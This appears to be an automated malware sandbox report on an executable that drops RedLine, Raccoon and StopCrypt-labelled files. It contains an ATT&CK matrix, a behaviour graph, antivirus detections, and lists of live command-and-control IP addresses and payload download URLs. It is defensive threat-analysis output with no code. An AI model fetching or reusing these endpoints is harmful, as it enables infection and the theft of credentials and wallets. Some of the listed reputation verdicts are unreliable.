                    Input Capture
                    Automated Exfiltration1
                    Non-Standard Port
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)32
                    Software Packing
                    NTDS154
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer4
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets331
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size Limits15
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common3
                    Masquerading
                    Cached Domain Credentials241
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items241
                    Virtualization/Sandbox Evasion
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                    Process Injection
                    Proc Filesystem1
                    Application Window Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Rundll32
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                    Remote System Discovery
                    Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 688997 Sample: q1wLT3xKiY.exe Startdate: 23/08/2022 Architecture: WINDOWS Score: 100 77 iplogger.org 2->77 79 dns.google 2->79 81 2 other IPs or domains 2->81 113 Snort IDS alert for network traffic 2->113 115 Malicious sample detected (through community Yara rule) 2->115 117 Antivirus detection for URL or domain 2->117 119 17 other signatures 2->119 10 q1wLT3xKiY.exe 16 28 2->10         started        13 rundll32.exe 2->13         started        signatures3 process4 file5 67 C:\Program Files (x86)\...\safert44.exe, PE32 10->67 dropped 69 C:\Program Files (x86)\Company\...\real.exe, PE32 10->69 dropped 71 C:\Program Files (x86)\...\ordo_sec666.exe, PE32 10->71 dropped 73 7 other malicious files 10->73 dropped 15 F0geI.exe 25 10->15         started        20 WW1.exe 10->20         started        22 real.exe 10->22         started        24 15 other processes 10->24 process6 dnsIp7 93 45.95.11.158, 49800, 80 ULTRA-PACKETUS Italy 15->93 55 C:\Users\user\AppData\...\vcruntime140.dll, PE32 15->55 dropped 57 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 15->57 dropped 59 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 15->59 dropped 65 4 other files (none is malicious) 15->65 dropped 107 Tries to harvest and steal browser information (history, passwords, etc) 15->107 109 Tries to steal Crypto Currency Wallets 15->109 95 62.204.41.126, 50013, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 20->95 111 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->111 97 t.me 149.154.167.99, 443, 49823, 49942 TELEGRAMRU United Kingdom 22->97 99 77.91.103.222, 49833, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 22->99 26 cmd.exe 22->26         started        101 103.89.90.61, 34589, 49934 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 24->101 103 195.54.170.157, 16525, 49978 VALICOM-ASPT unknown 24->103 105 4 other IPs or domains 24->105 61 C:\Users\user\AppData\Local\...\SETUP_~1.EXE, PE32 24->61 dropped 63 C:\Users\user\TypeRes\DllResource.exe, PE32 24->63 dropped 28 SETUP_~1.EXE 24->28         started        33 cmd.exe 24->33         started        35 chrome.exe 14 24->35         started        37 12 other processes 24->37 file8 signatures9 process10 dnsIp11 39 conhost.exe 26->39         started        41 taskkill.exe 26->41         started        43 timeout.exe 26->43         started        83 cdn.discordapp.com 162.159.134.233, 443, 49920 CLOUDFLARENETUS United States 28->83 85 cutt.ly 172.67.8.238, 443, 49915 CLOUDFLARENETUS United States 28->85 75 C:\Users\...\Alwgckdftdslvwbqpdbjc13t.exe, PE32 28->75 dropped 121 Encrypted powershell cmdline option found 28->121 45 powershell.exe 28->45         started        47 conhost.exe 33->47         started        49 taskkill.exe 33->49         started        51 timeout.exe 33->51         started        87 iplogger.org 148.251.234.83, 443, 49768, 49771 HETZNER-ASDE Germany 35->87 89 accounts.google.com 142.250.180.141, 443, 49766, 49770 GOOGLEUS United States 35->89 91 7 other IPs or domains 35->91 file12 signatures13 process14 process15 53 conhost.exe 45->53         started       

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    q1wLT3xKiY.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Program Files (x86)\Company\NewProduct\jshainx.exe100%AviraHEUR/AGEN.1251247
                    C:\Program Files (x86)\Company\NewProduct\WW1.exe100%AviraHEUR/AGEN.1250598
                    C:\Program Files (x86)\Company\NewProduct\real.exe100%AviraHEUR/AGEN.1250598
                    C:\Program Files (x86)\Company\NewProduct\brokerius.exe100%AviraHEUR/AGEN.1250598
                    C:\Program Files (x86)\Company\NewProduct\safert44.exe100%AviraHEUR/AGEN.1203016
                    C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe100%AviraHEUR/AGEN.1251247
                    C:\Program Files (x86)\Company\NewProduct\jshainx.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\WW1.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\real.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\F0geI.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\brokerius.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\safert44.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Company\NewProduct\F0geI.exe64%MetadefenderBrowse
                    C:\Program Files (x86)\Company\NewProduct\F0geI.exe96%ReversingLabsWin32.Ransomware.StopCrypt
                    C:\Program Files (x86)\Company\NewProduct\brokerius.exe58%ReversingLabsWin32.Infostealer.Convagent
                    C:\Program Files (x86)\Company\NewProduct\captain09876.exe37%MetadefenderBrowse
                    C:\Program Files (x86)\Company\NewProduct\captain09876.exe38%ReversingLabsByteCode-MSIL.Downloader.Seraph
                    C:\Program Files (x86)\Company\NewProduct\jshainx.exe46%MetadefenderBrowse
                    C:\Program Files (x86)\Company\NewProduct\jshainx.exe100%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer
                    C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe44%ReversingLabsWin32.Trojan.RaccoonSteal
                    C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe88%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer
                    C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe45%MetadefenderBrowse
                    C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe42%ReversingLabsWin32.Trojan.Generic
                    C:\Program Files (x86)\Company\NewProduct\safert44.exe80%ReversingLabsByteCode-MSIL.Infostealer.RedLine
                    C:\Users\user\AppData\LocalLow\freebl3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\freebl3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\mozglue.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\mozglue.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\msvcp140.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\msvcp140.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\nss3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\nss3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\softokn3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\softokn3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                    SourceDetectionScannerLabelLinkDownload
                    23.0.safert44.exe.420000.0.unpack100%AviraHEUR/AGEN.1203016Download File
                    31.2.WW1.exe.180000.0.unpack100%AviraHEUR/AGEN.1250598Download File
                    14.2.F0geI.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    26.0.brokerius.exe.30000.0.unpack100%AviraHEUR/AGEN.1250598Download File
                    16.2.kukurzka9000.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    22.0.real.exe.1230000.0.unpack100%AviraHEUR/AGEN.1250598Download File
                    31.0.WW1.exe.180000.0.unpack100%AviraHEUR/AGEN.1250598Download File
                    22.2.real.exe.1230000.0.unpack100%AviraHEUR/AGEN.1250598Download File
                    0.3.q1wLT3xKiY.exe.45ed014.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    26.2.brokerius.exe.30000.0.unpack100%AviraHEUR/AGEN.1250598Download File
                    21.0.namdoitntn.exe.d30000.0.unpack100%AviraHEUR/AGEN.1251247Download File
                    25.0.jshainx.exe.220000.0.unpack100%AviraHEUR/AGEN.1234957Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://iptc.org/mpCore0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://88.198.122.116/3478722452.zip0%Avira URL Cloudsafe
                    http://77.91.103.222/157180%Avira URL Cloudsafe
                    http://77.91.103.222/0%VirustotalBrowse
                    http://77.91.103.222/0%Avira URL Cloudsafe
                    http://77.91.103.222/3610134416.zip0%Avira URL Cloudsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600al0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600D;0%Avira URL Cloudsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600U;0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                    http://62.204.41.126:80100%Avira URL Cloudmalware
                    http://62.204.41.126/0659920757.zip100%Avira URL Cloudmalware
                    http://45.95.11.158/110%Avira URL Cloudsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600ta0%Avira URL Cloudsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d6007hL2vK/nss3.dll0%Avira URL Cloudsafe
                    https://web.telegram.orgZ0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    http://62.204.41.126:801170NULL%s0%Avira URL Cloudsafe
                    https://iplogger.org$0%Avira URL Cloudsafe
                    http://77.91.103.222:80/3610134416.zipC0%Avira URL Cloudsafe
                    http://45.95.11.158/Q2m0%Avira URL Cloudsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600T0%Avira URL Cloudsafe
                    http://77.91.103.222:80/3610134416.ziph0%Avira URL Cloudsafe
                    https://mas.to/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                    http://62.204.41.126:80/0659920757.ziph100%Avira URL Cloudmalware
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600l0%Avira URL Cloudsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600w0%Avira URL Cloudsafe
                    http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600r0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cutt.ly
                    172.67.8.238
                    truefalse
                      high
                      accounts.google.com
                      142.250.180.141
                      truefalse
                        high
                        t.me
                        149.154.167.99
                        truefalse
                          high
                          cdn.discordapp.com
                          162.159.134.233
                          truefalse
                            high
                            iplogger.org
                            148.251.234.83
                            truefalse
                              high
                              www.google.com
                              142.251.209.4
                              truefalse
                                high
                                clients.l.google.com
                                216.58.209.46
                                truefalse
                                  high
                                  dns.google
                                  8.8.4.4
                                  truefalse
                                    high
                                    clients2.google.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://iplogger.org/1AFmX4false
                                        high
                                        http://88.198.122.116/3478722452.zipfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://77.91.103.222/false
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://77.91.103.222/3610134416.zipfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://62.204.41.126/0659920757.ziptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://iplogger.org/1AJmX4false
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://iptc.org/mpCorejshainx.exe, 00000019.00000002.859740115.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/chrome_newtabF0geI.exe, 0000000E.00000003.390549774.0000000003CAE000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.870304762.0000000003236000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000003.372438638.00000000285A0000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.554787504.000000002781F000.00000004.00000800.00020000.00000000.sdmp, WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dknamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultLjshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://iplogger.org/1AJmX4real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Entity/Id12Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://telegram.org/img/t_logo.pngreal.exe, 00000016.00000003.334829493.00000000014BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://tempuri.org/Entity/Id2Responsesafert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Entity/Id21Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuenamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://77.91.103.222/15718real.exe, 00000016.00000003.357918765.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.368333119.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000002.419978135.00000000014A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdn.discordapp.com/attachments/1006526153294618657/1009394950338781266/2.0.2-beta_Nwjkxkwv.jSETUP_~1.EXE, 00000028.00000002.866354989.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.866303004.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortednamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600alF0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id15Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenamdoitntn.exe, 00000015.00000002.867825172.00000000031C3000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.865147865.0000000002A77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://iplogger.org/1AZmX4q1wLT3xKiY.exe, 00000000.00000003.348874687.0000000000757000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000016.00000003.361184384.00000000285A9000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000016.00000002.502475214.00000000288A9000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.538480063.0000000027828000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.635846325.0000000027B13000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registernamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeynamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://api.ip.sb/ipnamdoitntn.exe, 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600D;F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelnamdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=WW1.exe, 0000001F.00000003.680018131.0000000001673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600U;F0geI.exe, 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.390750632.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Entity/Id24Responsenamdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpfalse
